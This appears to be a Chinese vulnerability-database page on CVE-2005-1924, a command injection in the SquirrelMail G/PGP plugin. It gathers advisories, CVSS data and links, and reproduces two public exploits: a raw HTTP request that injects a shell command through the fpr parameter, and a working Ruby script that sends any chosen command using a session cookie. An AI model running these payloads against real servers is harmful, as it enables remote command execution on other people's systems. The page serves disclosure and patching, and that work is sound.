CVE-2005-1924
CVSS9.3
发布时间 :2005-12-31 00:00:00
修订时间 :2012-10-30 21:47:31
NMCOEPS    

[原文]The G/PGP (GPG) Plugin 2.1 and earlier for Squirrelmail allow remote authenticated users to execute arbitrary commands via shell metacharacters in (1) the fpr parameter to the deleteKey function in gpg_keyring.php, as called by (a) import_key_file.php, (b) import_key_text.php, and (c) keyring_main.php; and (2) the keyserver parameter to the gpg_recv_key function in gpg_key_functions.php, as called by gpg_options.php. NOTE: this issue may overlap CVE-2007-3636.


[CNNVD]SquirrelMail G/PGP加密插件多个远程命令执行漏洞(CNNVD-200512-716)

        SquirrelMail是一个多功能的用PHP4实现的Webmail程序,可运行于Linux/Unix类操作系统下。
        SquirrelMail的实现上存在多个输入验证漏洞,远程攻击者可能利用这些漏洞在服务器上执行任意命令。SquirrelMail中的G/PGP加密插件没有正确地过滤所包含的某些文件,gpg_help.php和gpg_help_base.php文件中可能包含有通过""help"" HTTP GET请求参数所提供的本地文件。

- CVSS (基础分值)

CVSS分值: 9.3 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: MEDIUM [漏洞利用存在一定的访问条件]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1924
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1924
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200512-716
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2007/2513
(UNKNOWN)  VUPEN  ADV-2007-2513
http://www.securityfocus.com/bid/24874
(UNKNOWN)  BID  24874
http://www.securityfocus.com/archive/1/archive/1/473370/100/0/threaded
(UNKNOWN)  BUGTRAQ  20070711 SquirrelMail G/PGP Encryption Plug-in Remote Command Execution Vulnerability
http://www.attrition.org/pipermail/vim/2007-July/001710.html
(UNKNOWN)  VIM  20070711 True: SquirrelMail G/PGP Encryption Plug-in 2.0 Command Execution Vuln
http://secunia.com/advisories/26035
(VENDOR_ADVISORY)  SECUNIA  26035
http://osvdb.org/37924
(UNKNOWN)  OSVDB  37924
http://osvdb.org/37923
(UNKNOWN)  OSVDB  37923
http://milw0rm.com/exploits/4173
(UNKNOWN)  MILW0RM  4173
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=331
(UNKNOWN)  IDEFENSE  20070711 SquirrelMail G/PGP Plugin gpg_recv_key() Command Injection Vulnerability
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=329
(UNKNOWN)  IDEFENSE  20070711 SquirrelMail G/PGP Plugin deleteKey() Command Injection Vulnerability
http://xforce.iss.net/xforce/xfdb/35364
(UNKNOWN)  XF  squirrelmail-gpgp-keyfunc-command-execution(35364)
http://xforce.iss.net/xforce/xfdb/35355
(UNKNOWN)  XF  squirrelmail-gpgp-keyring-command-execution(35355)
http://security.gentoo.org/glsa/glsa-200708-08.xml
(UNKNOWN)  GENTOO  GLSA-200708-08
http://secunia.com/advisories/26424
(UNKNOWN)  SECUNIA  26424

- 漏洞信息

SquirrelMail G/PGP加密插件多个远程命令执行漏洞
高危 输入验证
2005-12-31 00:00:00 2012-12-26 00:00:00
远程  
        SquirrelMail是一个多功能的用PHP4实现的Webmail程序,可运行于Linux/Unix类操作系统下。
        SquirrelMail的实现上存在多个输入验证漏洞,远程攻击者可能利用这些漏洞在服务器上执行任意命令。SquirrelMail中的G/PGP加密插件没有正确地过滤所包含的某些文件,gpg_help.php和gpg_help_base.php文件中可能包含有通过""help"" HTTP GET请求参数所提供的本地文件。

- 公告与补丁

        

- 漏洞信息 (4173)

SquirrelMail G/PGP Encryption Plug-in 2.0 Command Execution Vuln (EDBID:4173)
php webapps
2007-07-11 Verified
0 jmp-esp
N/A [点击下载]
SquirrelMail G/PGP Encryption Plug-in Remote Command Execution Vulnerability

Bugtraq ID: 24782

-----------------------------

There are various vulnerabilities in this software! One is in
keyring_main.php!
$fpr is not escaped from shellcommands!

testbox:/home/w00t# cat /tmp/w00t
cat: /tmp/w00t: No such file or directory
testbox:/home/w00t#

***@silverlaptop:~$ nc *** 80
POST /webmail/plugins/gpg/modules/keyring_main.php HTTP/1.1
Host: ***
User-Agent: w00t
Keep-Alive: 300
Connection: keep-alive
Cookie: Authentication Data for SquirrelMail
Content-Type: application/x-www-form-urlencoded
Content-Length: 140

id=C5B1611B8E71C***&fpr= | touch /tmp/w00t |
&pos=0&sort=email_name&desc=&srch=&ring=all&passphrase=&deletekey=true&deletepair=false&trust=1

...

testbox:/home/w00t# cat /tmp/w00t
testbox:/home/w00t#

So we just executed 'touch /tmp/w00t'!

WabiSabiLabi tries to sell the exploit for 700 Euro! ;)
lol @ WabiSabiLabi!

Greets:

oli and all members of jmp-esp!


jmp-esp is looking for people who are interested in IT security!
Currently we are looking for people who like to write articles for a
German ezine or are interested in exchanging informations, exploits...

IRC: jmp-esp.kicks-ass.net / 6667 or 6661 (ssl)
    #main

# milw0rm.com [2007-07-11]
		

- 漏洞信息 (4718)

SquirrelMail G/PGP Plugin deletekey() Command Injection Exploit (EDBID:4718)
php webapps
2007-12-11 Verified
0 Backdoored
N/A [点击下载]
#!/usr/local/bin/ruby

puts"http://backdoored.net\n"
puts "SquirrelMail G/PG deletekey() command injection exploit\n"
puts "http://backdoored.net    Visit Us\n"
puts "Coded by Backdoored member.   \n" 
puts "--------------------------------------------------\n"

if ARGV[0] == nil && ARGV[1] == nil && ARGV[2] ==  nil && ARGV[3] == nil && ARGV[4] == nil && ARGV[5] == nil
puts "Usage: ./squ_xploit  hostname path port cookie command 0\n"
puts "if host using ssl use 1 instead of 0\n"
exit
end

require 'net/http'
require 'net/https'

host = ARGV[0].to_s
port = ARGV[2].to_i
cookie = ARGV[3].to_s
victim = Net::HTTP.new(host,port)
	if ARGV[3].to_i == 1
	puts "Entering SSL mode baby\n"
	victim.use_ssl = true
	end
command = ARGV[4].to_s
#path = '/sq/plugins/gpg/modules/keyring_main.php'
path = ARGV[1].to_s
data = "id=C5B1611B8E71C***&fpr= | " + command + "| &pos=0&sort=email_name&desc=&srch=&ring=all&passphrase=&deletekey=true&deletepair=false&trust=1"
pizza = "key=pYWrEbVTY%2Bc%3D; SQMSESSID=" + cookie;
headers = {
  'Cookie' => pizza,
  'Referer' => 'http://www.google.com',
  'Content-Type' => 'application/x-www-form-urlencoded'
}
resp, data = victim.post(path,data,headers)
puts 'Message = ' + resp.message
puts  'Code = ' + resp.code

resp.each {|key,val| puts key + ' = ' + val}
#puts data

# milw0rm.com [2007-12-11]
		

- 漏洞信息 (F58497)

Gentoo Linux Security Advisory 200708-8 (PacketStormID:F58497)
2007-08-14 00:00:00
Gentoo  security.gentoo.org
advisory
linux,gentoo
CVE-2005-1924,CVE-2006-4169
[点击下载]

Gentoo Linux Security Advisory GLSA 200708-08 - The functions deletekey(), gpg_check_sign_pgp_mime() and gpg_recv_key() used in the SquirrelMail G/PGP encryption plugin do not properly escape user-supplied data. Versions less than 1.4.10a-r2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200708-08
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: SquirrelMail G/PGP plugin: Arbitrary code execution
      Date: August 11, 2007
      Bugs: #185010
        ID: 200708-08

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities have been discovered in SquirrelMail, allowing
for the remote execution of arbitrary code.

Background
==========

SquirrelMail is a webmail package written in PHP. It supports IMAP and
SMTP protocols.

Affected packages
=================

    -------------------------------------------------------------------
     Package                   /   Vulnerable   /           Unaffected
    -------------------------------------------------------------------
  1  mail-client/squirrelmail     < 1.4.10a-r2           >= 1.4.10a-r2

Description
===========

The functions deletekey(), gpg_check_sign_pgp_mime() and gpg_recv_key()
used in the SquirrelMail G/PGP encryption plugin do not properly escape
user-supplied data.

Impact
======

An authenticated user could use the plugin to execute arbitrary code on
the server, or a remote attacker could send a specially crafted e-mail
to a SquirrelMail user, possibly leading to the execution of arbitrary
code with the privileges of the user running the underlying web server.
Note that the G/PGP plugin is disabled by default.

Workaround
==========

Enter the SquirrelMail configuration directory
(/usr/share/webapps/squirrelmail/version/htdocs/config), then execute
the conf.pl script. Select the plugins menu, then select the gpg plugin
item number in the "Installed Plugins" list to disable it. Press S to
save your changes, then Q to quit.

Resolution
==========

All SquirrelMail users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=mail-client/squirrelmail-1.4.10a-r2"

References
==========

  [ 1 ] CVE-2005-1924
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1924
  [ 2 ] CVE-2006-4169
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4169

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200708-08.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
    

- 漏洞信息 (F57672)

iDEFENSE Security Advisory 2007-07-11.5 (PacketStormID:F57672)
2007-07-12 00:00:00
iDefense Labs  idefense.com
advisory,remote,web,arbitrary
CVE-2005-1924
[点击下载]

iDefense Security Advisory 07.11.07 - Remote exploitation of a command injection vulnerability in the G/PGP Encryption Plugin for The SquirrelMail Project Team's SquirrelMail webmail package allows attackers to execute arbitrary commands with the privileges of the underlying web server. The gpg_recv_key() function is affected. iDefense has confirmed the existence of this vulnerability in the latest version of the G/PGP Encryption Plugin for SquirrelMail, version 2.1. Furthermore, this vulnerability has been confirmed to exist as early as version 2.0. Other versions may be affected.

SquirrelMail G/PGP Plugin gpg_recv_key() Command Injection Vulnerability

iDefense Security Advisory 07.11.07
http://labs.idefense.com/intelligence/vulnerabilities/
Jul 11, 2007

I. BACKGROUND

The SquirrelMail G/PGP Encrpytion Plugin is a general purpose
encryption, decryption, and digital signature plug-in for SquirrelMail
that implements the OpenPGP standard using GPG. More information is
available at the following URL.

http://www.squirrelmail.org/plugin_view.php?id=153

II. DESCRIPTION

Remote exploitation of a command injection vulnerability in the G/PGP
Encrpytion Plugin for The SquirrelMail Project Team's SquirrelMail
webmail package allows attackers to execute arbitrary commands with the
privileges of the underlying web server.

The problem specifically exists within the function gpg_recv_key()
defined in gpg_key_functions.php. A call is made to exec() with
unfiltered user-supplied data as demonstrated in the following piece of
code:

    $command = "$path_to_gpg --batch --no-tty --homedir $gpg_key_dir \
             --keyserver hkp://$keyserver --recv-key $searchkeyid 2>&1";
    [...]
    exec($command, $output, $returnval);

The aforementioned '$keyserver' variable is supplied in the POST data to
the gpg_options.php script. The attacker must have a valid authenticated
session to exploit this vulnerability.

III. ANALYSIS

Exploitation of the described vulnerability allows authenticated remote
attackers to execute arbitrary commands with the privileges of the
underlying web server.

This vulnerability could be exploited by webmail users to gain shell
access on the target server and potentially further compromise the
system with local privilege escalation vulnerabilities.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in the latest
version of the G/PGP Encryption Plugin for SquirrelMail, version 2.1.
Furthermore, this vulnerability has been confirmed to exist as early as
version 2.0. Other versions may be affected.

V. WORKAROUND

Disable the G/PGP Plugin if it is not required. Alternatively, add the
following line above the initialization of the '$command' variable just
prior to the call to exec():

    $keyserver = escapeshellarg($keyserver);

Please note that this is an unofficial source patch, but should be
sufficient as a workaround until an official patch is released from the
vendor.

VI. VENDOR RESPONSE

The maintainers of the SquirrelMail G/PGP plug-in have not responded to
repeated inquires regarding this vulnerability. As such, it remains
unpatched, even in the most current release made on July 7th, 2007.

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2005-1924 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

10/27/2005  Initial vendor notification
10/27/2005  Initial vendor response
03/02/2006  Second vendor notification
02/16/2007  Third vendor notification
07/11/2007  Public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright     

- 漏洞信息 (F57670)

iDEFENSE Security Advisory 2007-07-11.3 (PacketStormID:F57670)
2007-07-12 00:00:00
iDefense Labs  idefense.com
advisory,remote,web,arbitrary
CVE-2005-1924
[点击下载]

iDefense Security Advisory 07.11.07 - Remote exploitation of a command injection vulnerability in the G/PGP Encryption Plugin for The SquirrelMail Project Team's SquirrelMail webmail package allows attackers to execute arbitrary commands with the privileges of the underlying web server. The deleteKey() functionality is affected. iDefense has confirmed the existence of this vulnerability in the latest version of the G/PGP Encryption Plugin for SquirrelMail, version 2.1. Furthermore, this vulnerability has been confirmed to exist as early as version 2.0. Other versions may be affected.

SquirrelMail G/PGP Plugin deleteKey() Command Injection Vulnerability

iDefense Security Advisory 07.11.07
http://labs.idefense.com/intelligence/vulnerabilities/
Jul 11, 2007

I. BACKGROUND

The SquirrelMail G/PGP Encrpytion Plugin is a general purpose
encryption, decryption, and digital signature plug-in for SquirrelMail
that implements the OpenPGP standard using GPG. More information is
available at the following URL.

http://www.squirrelmail.org/plugin_view.php?id=153

II. DESCRIPTION

Remote exploitation of a command injection vulnerability in the G/PGP
Encrpytion Plugin for The SquirrelMail Project Team's SquirrelMail
webmail package allows attackers to execute arbitrary commands with the
privileges of the underlying web server.

The problem specifically exists within the function deleteKey() defined
in gpg_keyring.php. A call is made to exec() with unfiltered
user-supplied data as demonstrated in the following piece of code:

    $command = "$path_to_gpg --batch --no-tty --yes --homedir \
                $gpg_key_dir $flag $fpr 2>&1";
    exec($command, $output, $returnval);

The deleteKey() routine is called from three files: import_key_file.php,
import_key_text.php and keyring_main.php. the '$fpr' variable from above
is supplied in the POST data. The attacker must have a valid
authenticated session to exploit this vulnerability.

III. ANALYSIS

Exploitation of the described vulnerability allows authenticated remote
attackers to execute arbitrary commands with the privileges of the
underlying web server.

This vulnerability could be exploited by webmail users to gain shell
access on the target server and potentially further compromise the
system with local privilege escalation vulnerabilities.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in the latest
version of the G/PGP Encryption Plugin for SquirrelMail, version 2.1.
Furthermore, this vulnerability has been confirmed to exist as early as
version 2.0. Other versions may be affected.

V. WORKAROUND

Disable the G/PGP Plugin if it is not required. Alternatively, add the
following line above the initialization of the '$command' variable just
prior to the call to exec():

    $fpr = escapeshellarg($fpr);

Please note that this is an unofficial source patch, but should be
sufficient as a workaround until an official patch is released from the
vendor.

VI. VENDOR RESPONSE

The maintainers of the SquirrelMail G/PGP plug-in have not responded to
repeated inquires regarding this vulnerability. As such, it remains
unpatched, even in the most current release made on July 7th, 2007.

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2005-1924 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

10/27/2005  Initial vendor notification
10/27/2005  Initial vendor response
03/02/2006  Second vendor notification
02/16/2007  Third vendor notification
07/11/2007  Public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright     

- 漏洞信息

37923
SquirrelMail G/PGP (GPG) Plugin gpg_keyring.php deleteKey Function Arbitrary Command Execution
Remote / Network Access
Exploit Public, Exploit Private Vendor Verified

- 漏洞描述

- 时间线

2007-07-11 Unknow
Unknow 2007-08-11

- 解决方案

Currently, there are no known upgrades or patches to correct this vulnerability. It is possible to temporarily work around the flaw by implementing the following workaround: Disable the G/PGP Plugin if it is not required. Alternatively, add the following line above the initialization of the '$command' variable just prior to the call to exec(): $fpr = escapeshellarg($fpr); Please note that this is an unofficial source patch, but should be sufficient as a workaround until an official patch is released from the vendor.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

SquirrelMail G/PGP Encryption Plug-in Multiple Remote Command Execution Vulnerabilities
Input Validation Error 24874
Yes Yes
2007-07-11 12:00:00 2007-12-18 08:06:00
Anonymous researchers discovered these issues. iDefense disclosed them to the public.

- 受影响的程序版本

SquirrelMail G/PGP Encryption Plugin 2.1
SquirrelMail G/PGP Encryption Plugin 2.0
Gentoo Linux

- 漏洞讨论

Vulnerabilities in the SquirrelMail G/PGP encryption plugin may allow attackers to execute shell commands and PHP script code. These issues occur because the application fails to sufficiently sanitize user-supplied data.

Commands and scripts would run in the context of the webserver hosting the vulnerable software.

Three separate shell command-injection vulnerabilities and one local file-include vulnerability are present in various versions of the affected plugin. One of these issues has been addressed in G/PGP Encryption 2.1, but the others are still unfixed.

One or more of these issues may already have been documented in the following BIDs, but sufficient information is not currently available to distinguish between them:

- 24782, SquirrelMail G/PGP Encryption Plug-in Unspecified Remote Command Execution Vulnerability
- 24828, SquirrelMail G/PGP Encryption Plug-in Multiple Unspecified Remote Command Execution Vulnerabilities

All affected BIDs will be updated when more information is released.

- 漏洞利用

Attackers may use a browser to exploit these issues.

UPDATE (December 11, 2007): An exploit of the 'deletekey()' issue is available:

- 解决方案

Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com.

NOTE: One of the command-injection issues is addressed in SquirrelMail G/PGP Encryption 2.1.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站